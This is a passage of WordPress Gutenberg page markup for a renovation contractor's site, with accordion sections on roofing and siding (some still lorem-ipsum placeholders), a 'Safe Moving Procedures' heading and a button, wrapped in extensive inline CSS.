12px;}\n.skt-blocks-block-2ca58aed .skt-blocks-icon-active svg{\nwidth: 12px;height: 12px;font-size: 12px;}\n}\n</style><style type=\"text/css\"> .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: #FFFFFF; }\n .skt-blocks-accordion-item-active .skt-blocks-accordion-titles-button.skt-blocks-accordion-titles {\n color: undefined; background-color: undefined; }\n</style><div class=\"skt-blocks-accordion__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/accordion-item {\"block_id\":\"b558cea3\",\"title\":\"Roofing\",\"content\":\"With Mike or Justin on every job you can be sure to receive quality that cannot be beat.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-b558cea3 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Roofing</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>With Mike or Justin on every job you can be sure to receive quality that cannot be beat.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"c6160104\",\"title\":\"Siding\",\"content\":\"Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-c6160104 gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Siding</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Whether it be new vinyl shakes or custom metal trim contact Dunrite today for a free estimate.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"886d432c\",\"title\":\"Unknown printer galley\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-886d432c gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Unknown printer galley</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"e4ac92de\",\"title\":\"Aldus PageMaker including\",\"content\":\"Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-e4ac92de gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Aldus PageMaker including</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>Nullam eget luctu, quis sollicitau. Suspendisse biendum congue purust ristique est aicinelitd olo recons equ untur natus auda.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"8ade65a6-95be-43c3-a862-faf812de3e49\"} -->\n<style type=\"text/css\"> .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8ade65a6-95be-43c3-a862-faf812de3e49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6c332def-c8d3-4470-b49f-90dc1ba0fb14\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"boxShadowColor\":\"\",\"boxShadowPosition\":\"\",\"className\":\"gb-renovation-section-9\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-9 skt-blocks-block-section-outer-wrap block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px  \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"dc07bcbb-e525-4314-b589-15be45dc4e59\"} -->\n<style type=\"text/css\"> .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-dc07bcbb-e525-4314-b589-15be45dc4e59 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"d6b07e0e-145d-4fcf-b0ab-81e1597b2431\"} -->\n<style type=\"text/css\"> .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a76f9b72-1972-4fc1-9508-94e879ce8fe8\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"separatorSpacingTablet\":35,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":0,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 35px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 0px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a76f9b72-1972-4fc1-9508-94e879ce8fe8\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Our Safe Moving<br>Procedures</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":30,\"blockId\":\"ee5678bf-92ed-4865-aa79-230e1108a2f5\"} -->\n<style type=\"text/css\"> .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ee5678bf-92ed-4865-aa79-230e1108a2f5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"View All\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\",\"counterId\":\"a5cb6a55-72ca-447b-9d80-e0be7d2f2b89\",\"hPadding\":25,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 25px; padding-right: 25px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; 